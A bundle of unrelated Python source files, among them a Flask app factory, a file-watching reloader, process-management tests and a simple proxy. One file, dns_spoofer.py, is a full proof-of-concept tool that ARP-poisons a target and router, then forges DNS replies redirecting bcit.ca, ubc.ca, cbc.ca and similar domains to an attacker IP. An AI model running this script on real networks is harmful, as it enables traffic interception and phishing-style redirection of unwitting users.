rv = [sys.executable]
rv.extend(sys.argv)
return rv
def restart_with_reloader():
"""Create a new process and a subprocess in it with the same arguments as
this one.
"""
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ['SANIC_SERVER_RUNNING'] = 'true'
cmd = ' '.join(args)
worker_process = Process(
target=subprocess.call, args=(cmd,),
kwargs=dict(shell=True, env=new_environ))
worker_process.start()
return worker_process
def kill_process_children_unix(pid):
"""Find and kill child process of a process (maximum two level).
:param pid: PID of process (process ID)
:return: Nothing
"""
root_process_path = "/proc/{pid}/task/{pid}/children".format(pid=pid)
if not os.path.isfile(root_process_path):
return
with open(root_process_path) as children_list_file:
children_list_pid = children_list_file.read().split()
for child_pid in children_list_pid:
children_proc_path = "/proc/%s/task/%s/children" % \
(child_pid, child_pid)
if not os.path.isfile(children_proc_path):
continue
with open(children_proc_path) as children_list_file_2:
children_list_pid_2 = children_list_file_2.read().split()
for _pid in children_list_pid_2:
os.kill(int(_pid), signal.SIGTERM)
def kill_program_completly(proc):
"""Kill worker and it's child processes and exit.
:param proc: worker process (process ID)
:return: Nothing
"""
kill_process_children_unix(proc.pid)
proc.terminate()
os._exit(0)
def watchdog(sleep_interval):
"""Watch project files, restart worker process if a change happened.
:param sleep_interval: polling interval in seconds.
:return: Nothing
"""
mtimes = {}
worker_process = restart_with_reloader()
signal.signal(
signal.SIGTERM, lambda *args: kill_program_completly(worker_process))
signal.signal(
signal.SIGINT, lambda *args: kill_program_completly(worker_process))
while True:
for filename in _iter_module_files():
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
kill_process_children_unix(worker_process.pid)
worker_process = restart_with_reloader()
mtimes[filename] = mtime
break
sleep(sleep_interval)
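# Illustrative sketch (assumed entry point, not part of the original module):
# a launcher would call the watchdog directly, polling module files once per
# second and restarting the worker process on any change.
#
#   if __name__ == '__main__':
#       watchdog(sleep_interval=1)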
|
app.py
|
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
import gevent.monkey
gevent.monkey.patch_all()
import logging
import sys
import os
import threading
from flask import Flask, render_template, current_app
from flask_restful import Api
from walle import commands
from walle.api import access as AccessAPI
from walle.api import api as BaseAPI
from walle.api import deploy as DeployAPI
from walle.api import environment as EnvironmentAPI
from walle.api import general as GeneralAPI
from walle.api import group as GroupAPI
from walle.api import passport as PassportAPI
from walle.api import project as ProjectAPI
from walle.api import repo as RepoApi
from walle.api import role as RoleAPI
from walle.api import server as ServerAPI
from walle.api import space as SpaceAPI
from walle.api import task as TaskAPI
from walle.api import user as UserAPI
from walle.config.settings_prod import ProdConfig
from walle.model.user import UserModel, AnonymousUser
from walle.service.code import Code
from walle.service.error import WalleError
from walle.service.extensions import bcrypt, csrf_protect, db, migrate
from walle.service.extensions import login_manager, mail, permission, socketio
from walle.service.websocket import WalleSocketIO
def create_app(config_object=ProdConfig):
"""An application factory, as explained here: http://flask.pocoo.org/docs/patterns/appfactories/.
:param config_object: The configuration object to use.
"""
app = Flask(__name__.split('.')[0])
app.config.from_object(config_object)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
register_shellcontext(app)
register_commands(app)
register_logging(app)
@app.before_request
def before_request():
# TODO
pass
@app.teardown_request
def shutdown_session(exception=None):
# TODO
from walle.model.database import db
db.session.remove()
@app.route('/api/websocket')
def index():
return render_template('socketio.html')
# unit tests do not need the websocket server
if app.config.get('ENV') != 'test':
register_socketio(app)
try:
reload(sys)
sys.setdefaultencoding('utf-8')
except NameError:
pass
return app
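# Illustrative sketch (assumed usage, not part of this module): the factory is
# typically consumed by a WSGI runner or a small entry script, e.g.:
#
#   app = create_app(ProdConfig)
#   app.run(host=app.config.get('HOST'), port=app.config.get('PORT'))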
def register_extensions(app):
"""Register Flask extensions."""
bcrypt.init_app(app)
db.init_app(app)
csrf_protect.init_app(app)
login_manager.session_protection = 'strong'
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
current_app.logger.info(user_id)
return UserModel.query.get(user_id)
@login_manager.unauthorized_handler
def unauthorized():
# TODO log
return BaseAPI.ApiResource.json(code=Code.unlogin)
login_manager.init_app(app)
migrate.init_app(app, db)
mail.init_app(app)
permission.init_app(app)
return app
def register_blueprints(app):
"""Register Flask blueprints."""
api = Api(app)
api.add_resource(BaseAPI.Base, '/', endpoint='root')
api.add_resource(GeneralAPI.GeneralAPI, '/api/general/<string:action>', endpoint='general')
api.add_resource(SpaceAPI.SpaceAPI, '/api/space/', '/api/space/<int:space_id>', '/api/space/<int:space_id>/<string:action>', endpoint='space')
api.add_resource(DeployAPI.DeployAPI, '/api/deploy/', '/api/deploy/<int:task_id>', endpoint='deploy')
api.add_resource(AccessAPI.AccessAPI, '/api/access/', '/api/access/<int:access_id>', endpoint='access')
api.add_resource(RoleAPI.RoleAPI, '/api/role/', endpoint='role')
api.add_resource(GroupAPI.GroupAPI, '/api/group/', '/api/group/<int:group_id>', endpoint='group')
api.add_resource(PassportAPI.PassportAPI, '/api/passport/', '/api/passport/<string:action>', endpoint='passport')
api.add_resource(UserAPI.UserAPI, '/api/user/', '/api/user/<int:user_id>/<string:action>', '/api/user/<string:action>', '/api/user/<int:user_id>', endpoint='user')
api.add_resource(ServerAPI.ServerAPI, '/api/server/', '/api/server/<int:id>', endpoint='server')
api.add_resource(ProjectAPI.ProjectAPI, '/api/project/', '/api/project/<int:project_id>', '/api/project/<int:project_id>/<string:action>', endpoint='project')
api.add_resource(RepoApi.RepoAPI, '/api/repo/<string:action>/', endpoint='repo')
api.add_resource(TaskAPI.TaskAPI, '/api/task/', '/api/task/<int:task_id>', '/api/task/<int:task_id>/<string:action>', endpoint='task')
api.add_resource(EnvironmentAPI.EnvironmentAPI, '/api/environment/', '/api/environment/<int:env_id>', endpoint='environment')
return None
def register_errorhandlers(app):
"""Register error handlers."""
@app.errorhandler(WalleError)
def render_error(error):
# the JSON response carries the custom error code and error message
app.logger.error(error, exc_info=1)
return error.render_error()
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {
'db': db,
'User': UserModel,
}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.test)
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
def register_logging(app):
# TODO https://blog.csdn.net/zwxiaoliu/article/details/80890136
# email errors to the administrators
import logging
from logging.handlers import RotatingFileHandler
# Formatter
formatter = logging.Formatter(
'%(asctime)s %(levelname)s %(pathname)s %(lineno)s %(module)s.%(funcName)s %(message)s')
# log dir
if not os.path.exists(app.config['LOG_PATH']):
os.makedirs(app.config['LOG_PATH'])
# FileHandler Info
file_handler_info = RotatingFileHandler(filename=app.config['LOG_PATH_INFO'])
file_handler_info.setFormatter(formatter)
file_handler_info.setLevel(logging.INFO)
info_filter = InfoFilter()
file_handler_info.addFilter(info_filter)
app.logger.addHandler(file_handler_info)
# FileHandler Error
file_handler_error = RotatingFileHandler(filename=app.config['LOG_PATH_ERROR'])
file_handler_error.setFormatter(formatter)
file_handler_error.setLevel(logging.ERROR)
app.logger.addHandler(file_handler_error)
def register_socketio(app):
if len(sys.argv) > 1 and sys.argv[1] == 'db':
return app
socketio.init_app(app, async_mode='gevent')
socketio.on_namespace(WalleSocketIO(namespace='/walle'))
socket_args = {"debug": app.config.get('DEBUG'), "host": app.config.get('HOST'), "port": app.config.get('PORT')}
socket_thread = threading.Thread(target=socketio.run, name="socket_thread", args=(app, ), kwargs=socket_args)
socket_thread.start()
return app
class InfoFilter(logging.Filter):
def filter(self, record):
"""only use INFO
筛选, 只需要 INFO 级别的log
:param record:
:return:
"""
if logging.INFO <= record.levelno < logging.ERROR:
# 已经是INFO级别了
# 然后利用父类, 返回 1
return 1
else:
return 0
|
dns_spoofer.py
|
#!/usr/bin/python
#------------------------------------------------------------------------------
# SOURCE: dns_spoofer.py
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Proof of concept DNS spoofer using python and scapy library.
#------------------------------------------------------------------------------
import signal
import uuid
import sys
import socket
import pcapy
import threading
import time
from uuid import getnode as get_mac
from scapy.all import *
from multiprocessing import *
from subprocess import Popen, PIPE
# 2d array to hold whitelisted sites and the IP address to redirect them to
sites = [["milliways.bcit.ca", "192.168.0.18"],
["bcit.ca", "192.168.0.18"],
["sfu.ca", "192.168.0.18"],
["ubc.ca", "192.168.0.18"],
["cbc.ca", "192.168.0.18"],
["sd43.bc.ca", "192.168.0.18"]]
#------------------------------------------------------------------------------
# FUNCTION: init_setup()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Drops firewall forwarding for UDP packets to port 53.
#------------------------------------------------------------------------------
def init_setup():
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
#------------------------------------------------------------------------------
# FUNCTION: get_my_mac()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Get MAC address of this machine (attacker machine).
#------------------------------------------------------------------------------
def get_my_mac():
_mac_addr = format(uuid.getnode(), '012x')  # zero-pad so a leading-zero MAC keeps 12 hex digits
return str(':'.join(_mac_addr[i : i + 2] for i in range(0, 12, 2)))
#------------------------------------------------------------------------------
# FUNCTION: get_target_mac()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Get MAC address of target machine. Makes use of two threads.
# One thread to send an ARP query to target machine. The other
# thread is used to read the query response from target machine
# as to extract the target machines MAC address.
#------------------------------------------------------------------------------
def get_target_mac():
_thread1 = threading.Thread(target=arp_request_target, args=(my_ip, my_mac, target_ip))
_thread2 = threading.Thread(target=read_target_response, args=())
_thread2.start()
time.sleep(0.5)
_thread1.start()
_thread1.join()
_thread2.join()
#------------------------------------------------------------------------------
# FUNCTION: get_router_mac()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Get MAC address of router. Makes use of two threads.
# One thread to send an ARP query to router. The other
# thread is used to read the query response from the router
# as to extract the routers MAC address.
#------------------------------------------------------------------------------
def get_router_mac():
_thread1 = threading.Thread(target=arp_request_router, args=(my_ip, my_mac, router_ip))
_thread2 = threading.Thread(target=read_router_response, args=())
_thread2.start()
time.sleep(0.5)
_thread1.start()
_thread1.join()
_thread2.join()
#------------------------------------------------------------------------------
# FUNCTION: arp_request_target(my_ip, my_mac, target_ip)
# my_ip : ip of attacker machine
# my_mac : MAC address of attacker machine
# target_ip : ip of target machine
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Send ARP request to get MAC address of target IP.
#------------------------------------------------------------------------------
def arp_request_target(my_ip, my_mac, target_ip):
send(ARP(op=1, hwsrc=my_mac, psrc=my_ip, pdst=target_ip), verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: arp_request_target(my_ip, my_mac, router_ip)
# my_ip : ip of attacker machine
# my_mac : MAC address of attacker machine
# router_ip : ip of router
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Send ARP request to get MAC address of router IP.
#------------------------------------------------------------------------------
def arp_request_router(my_ip, my_mac, router_ip):
send(ARP(op=1, hwsrc=my_mac, psrc=my_ip, pdst=router_ip), verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: read_target_response()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Read ARP response of target to get target MAC address.
#------------------------------------------------------------------------------
def read_target_response():
pkt = sniff(filter='arp', count=2) # sniff arp response
sys.stdout.write("Target ARP Response: " + target_ip + " -> " + pkt[1].hwsrc + '\n')
global target_mac
target_mac = str(pkt[1].hwsrc)
#------------------------------------------------------------------------------
# FUNCTION: read_router_response()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Read ARP response of router to get target MAC address.
#------------------------------------------------------------------------------
def read_router_response():
pkt = sniff(filter='arp', count=2) # sniff arp response
sys.stdout.write("Router ARP Response: " + router_ip + " -> " + pkt[1].hwsrc + '\n')
global router_mac
router_mac = str(pkt[1].hwsrc)
#------------------------------------------------------------------------------
# FUNCTION: arp_poison_target()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: ARP poison the targets ARP cache by sending fake ARP response.
#------------------------------------------------------------------------------
def arp_poison_target():
target_arp_poison = Ether(src=my_mac, dst=target_mac)/ARP(hwsrc=my_mac, hwdst=target_mac, psrc=router_ip, pdst=target_ip, op=2)
sendp(target_arp_poison, verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: arp_poison_router()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: ARP poison the routers ARP cache by sending fake ARP response.
#------------------------------------------------------------------------------
def arp_poison_router():
router_arp_poison = Ether(src=my_mac, dst=router_mac)/ARP(hwsrc=my_mac, hwdst=router_mac, psrc=target_ip, pdst=router_ip, op=2)
sendp(router_arp_poison, verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: arp_poison()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: High level function to ARP poison target and router.
#------------------------------------------------------------------------------
def arp_poison():
i = 0
while i < 10:
arp_poison_target()
arp_poison_router()
i += 1    # re-poison ten times, two seconds apart
time.sleep(2)
#------------------------------------------------------------------------------
# FUNCTION: print_info()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Print network info.
#------------------------------------------------------------------------------
def print_info():
sys.stdout.write("\nAttacker: " + my_ip + " -> " + my_mac + '\n')
sys.stdout.write("Target : " + target_ip + " -> " + target_mac + '\n')
sys.stdout.write("Router : " + router_ip + " -> " + router_mac + '\n\n')
#------------------------------------------------------------------------------
# FUNCTION: read_dns()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Sniff DNS query packets from target machine.
#------------------------------------------------------------------------------
def read_dns():
sniff_filter = "udp and port 53 and src " + str(target_ip)
sniff(filter=sniff_filter, prn=redirect)
#------------------------------------------------------------------------------
# FUNCTION: redirect(packet)
# packet : the sniffed DNS packet from target
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC:        Check if site from DNS query matches a whitelisted site.
#------------------------------------------------------------------------------
def redirect(packet):
for x in range(len(sites)):
if sites[x][0] in packet.getlayer(DNS).qd.qname:
spoof_packet(packet, sites[x][1])
print(str(packet.getlayer(DNS).qd.qname + " -> " + sites[x][1]))
#------------------------------------------------------------------------------
# FUNCTION: spoof_packet(packet, ip)
# packet : the sniffed DNS packet from target
# ip : ip to put in crafted DNS response as to redirect target
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC:        Craft and send a spoofed DNS response redirecting the target to the given IP.
#------------------------------------------------------------------------------
def spoof_packet(packet, ip):
ans = DNSRR(rrname=packet[DNS].qd.qname, ttl=200, rdata=ip)
dns = DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=ans)
response = IP(dst=target_ip, src=packet[IP].dst) / UDP(dport=packet[UDP].sport, sport=packet[UDP].dport) /dns
send(response, verbose=0)
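# Note on the forged response above: the IP source/destination and UDP ports are
# mirrored from the sniffed query ( src=packet[IP].dst impersonates the real DNS
# server, sport/dport are swapped ), and reusing packet[DNS].id makes the
# transaction id match, so the target's resolver accepts the answer.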
#------------------------------------------------------------------------------
# FUNCTION:    main()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5 2018
#
# DESC:        Main entry point of program.
#------------------------------------------------------------------------------
if __name__ == "__main__":
# Validate CMD ARGS
if len(sys.argv) != 4:
print("\nError: invalid arguments")
print("Usage: ./dns_spoof.py <ATTACKER IP> <TARGET IP> <ROUTER IP>\n")
exit()
# Extract CMD ARGS
my_ip = sys.argv[1]
target_ip = sys.argv[2]
router_ip = sys.argv[3]
my_mac = get_my_mac()
# Drop firewall forwarding
init_setup()
# Get MAC addr from target and router
get_target_mac()
get_router_mac()
# Print networking info (who has what IP and MAC addr)
print_info()
# Start ARP poisoning and DNS spoofing
arp_poison_proc = Process(target=arp_poison, args=())
dns_thread = Process(target=read_dns, args=())
arp_poison_proc.start()
dns_thread.start()
arp_poison_proc.join()
dns_thread.join()
|
villas_node.py
|
import threading
from villas.node.node import Node
from villas.controller.components.manager import Manager
from villas.controller.components.gateways.villas_node import VILLASnodeGateway
class VILLASnodeManager(Manager):
def __init__(self, **args):
self.autostart = args.get('autostart', False)
self.api_url = args.get('api_url', 'http://localhost:8080')
self.api_url_external = args.get('api_url_external', self.api_url)
args['api_url'] = self.api_url
self.thread_stop = threading.Event()
self.thread = threading.Thread(target=self.reconcile_periodically)
self.node = Node(**args)
self._status = self.node.status
args['uuid'] = self._status.get('uuid')
super().__init__(**args)
def reconcile_periodically(self):
while not self.thread_stop.wait(2):
self.reconcile()
def reconcile(self):
try:
self._status = self.node.status
self._nodes = self.node.nodes
for node in self._nodes:
self.logger.debug('Found node %s on gateway: %s',
node['name'], node)
if node['uuid'] in self.components:
ic = self.components[node['uuid']]
# Update state
ic.change_state(node['state'])
else:
ic = VILLASnodeGateway(self, node)
self.add_component(ic)
self.change_state('running')
except Exception as e:
self.change_to_error('failed to reconcile',
exception=str(e),
args=e.args)
@property
def status(self):
status = super().status
status['status']['villas_node_version'] = self._status.get('version')
return status
def on_ready(self):
if self.autostart and not self.node.is_running():
self.start()
self.thread.start()
super().on_ready()
def on_shutdown(self):
self.thread_stop.set()
self.thread.join()
return super().on_shutdown()
def start(self, payload):
self.node.start()
self.change_state('starting')
def stop(self, payload):
if self.node.is_running():
self.node.stop()
self.change_state('idle')
# Once the gateway shuts down, all of its nodes are shut down as well
for node in self.nodes:
node.change_state('shutdown')
def pause(self, payload):
self.node.pause()
self.change_state('paused')
# Pausing the gateway also pauses all of its nodes
for node in self.nodes:
node.change_state('paused')
def resume(self, payload):
self.node.resume()
def reset(self, payload):
self.node.restart()
|
global_handle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018-2019 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
from __future__ import print_function
import ctypes
import os
import traceback
from multiprocessing import sharedctypes
from avocado import fail_on
from apricot import TestWithServers
import check_for_pool
from pydaos.raw import DaosContext, DaosPool, DaosContainer, DaosApiError, IOV
class GlobalHandle(TestWithServers):
"""
This class contains tests to verify the ability to share container
handles among processes.
:avocado: recursive
"""
def tearDown(self):
try:
super(GlobalHandle, self).tearDown()
finally:
# really make sure everything is gone
check_for_pool.cleanup_pools(self.hostlist_servers)
@fail_on(DaosApiError)
def check_handle(self, pool_glob_handle, uuidstr, cont_glob_handle, rank):
"""
This gets run in a child process and verifies that the global
handles can be turned into local handles in another process.
"""
# setup the pool and connect using global handle
pool = DaosPool(self.context)
pool.uuid = uuidstr
pool.set_svc(rank)
pool.group = "daos_server"
buf = ctypes.cast(pool_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte *
pool_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
pool_handle = pool.global2local(self.context,
pool_glob_handle.iov_len,
pool_glob_handle.iov_buf_len,
buf2)
# perform an operation that will use the new handle, if it
# doesn't throw an exception, then all is well.
pool.pool_query()
# setup the container and then connect using the global handle
container = DaosContainer(self.context)
container.poh = pool_handle
buf = ctypes.cast(cont_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte *
cont_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
dummy_cont_handle = container.global2local(self.context,
cont_glob_handle.iov_len,
cont_glob_handle.iov_buf_len,
buf2)
# just try one thing to make sure handle is good
container.query()
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=all,container,tiny,pr,conthandle
"""
try:
# use the uid/gid of the user running the test, these should
# be perfectly valid
createuid = os.geteuid()
creategid = os.getegid()
# parameters used in pool create that are in yaml
createmode = self.params.get("mode", '/run/testparams/createmode/')
createsetid = self.params.get("setname",
'/run/testparams/createset/')
createsize = self.params.get("size", '/run/testparams/createsize/')
# initialize a python pool object then create the underlying
# daos storage
self.pool = DaosPool(self.context)
self.pool.create(createmode, createuid, creategid,
createsize, createsetid, None)
self.pool.connect(1 << 1)
# create a pool global handle
iov_len, buf_len, buf = self.pool.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_pool_handle = (
sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len, iov_len))
# create a container
self.container = DaosContainer(self.context)
self.container.create(self.pool.handle)
self.container.open()
# create a container global handle
iov_len, buf_len, buf = self.container.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_cont_handle = (
sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len, iov_len))
sct_pool_uuid = sharedctypes.RawArray(ctypes.c_byte, self.pool.uuid)
            # this should work in the future but needs on-line server addition
#arg_list = (
#p = Process(target=check_handle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
self.check_handle(sct_pool_handle, sct_pool_uuid,
sct_cont_handle, 0)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
multi_proxy_server.py
|
#!/usr/bin/env python3
import socket
import time, sys
from multiprocessing import Process
# address & buffer size for the proxy's listening socket
HOST = "localhost"
PORT = 8001
BUFFER_SIZE = 1024
def main():
extern_host = 'www.google.com'
extern_port = 80
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_start:
print('Starting proxy server')
proxy_start.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#bind socket to address
proxy_start.bind((HOST, PORT))
#set to listening mode
proxy_start.listen(2)
#continuously listen for connections
while True:
conn, addr = proxy_start.accept()
print("Connected by", addr)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_end:
print('Connecting to Google')
remote_ip = get_remote_ip(extern_host)
proxy_end.connect((remote_ip, extern_port))
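                # NOTE: proxy_end is connected but never used below; handle_request
                # simply echoes the client's data back instead of forwarding it upstream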
p = Process(target=handle_request, args=(addr, conn))
p.daemon = True
p.start()
print('Started process', p)
conn.close()
def get_remote_ip(host):
print(f'Getting IP for {host}')
try:
        remote_ip = socket.gethostbyname(host)
except socket.gaierror:
        print('Hostname could not be resolved. Exiting')
sys.exit()
    print(f'IP address of {host} is {remote_ip}')
return remote_ip
def handle_request(addr, conn):
print("Connected by", addr)
full_data = conn.recv(BUFFER_SIZE)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
if __name__ == "__main__":
main()
|
test_multiprocessing.py
|
import asyncio
import copy
import os
import sys
import multiprocessing
import threading
import time
import pytest
import loguru
import platform
from loguru import logger
def do_something(i):
logger.info("#{}", i)
def set_logger(logger_):
global logger
logger = logger_
def subworker(logger_):
logger_.info("Child")
def subworker_inheritance():
logger.info("Child")
def subworker_remove(logger_):
logger_.info("Child")
logger_.remove()
logger_.info("Nope")
def subworker_remove_inheritance():
logger.info("Child")
logger.remove()
logger.info("Nope")
def subworker_complete(logger_):
async def work():
logger_.info("Child")
await logger_.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(work())
def subworker_complete_inheritance():
async def work():
logger.info("Child")
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(work())
def subworker_barrier(logger_, barrier):
logger_.info("Child")
barrier.wait()
time.sleep(0.5)
logger_.info("Nope")
def subworker_barrier_inheritance(barrier):
logger.info("Child")
barrier.wait()
time.sleep(0.5)
logger.info("Nope")
class Writer:
def __init__(self):
self._output = ""
def write(self, message):
self._output += message
def read(self):
return self._output
def test_apply_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with ctx.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_apply_async_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with ctx.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_process_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = ctx.Process(target=subworker, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_inheritance)
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
def test_remove_in_child_process_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = ctx.Process(target=subworker_remove, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_remove, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_remove_inheritance)
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
def test_remove_in_main_process_spawn(monkeypatch):
    # Actually, this test may fail if the sleep time in the main process is too small (and no barrier is used)
    # In such a situation, the child process seems to not have enough time to initialize itself
    # It may fail with an "EOFError" during unpickling of the (garbage collected / closed) Queue
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
barrier = ctx.Barrier(2)
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = ctx.Process(target=subworker_barrier, args=(logger, barrier))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert process.exitcode == 0
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_fork():
writer = Writer()
barrier = multiprocessing.Barrier(2)
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_barrier, args=(logger, barrier))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
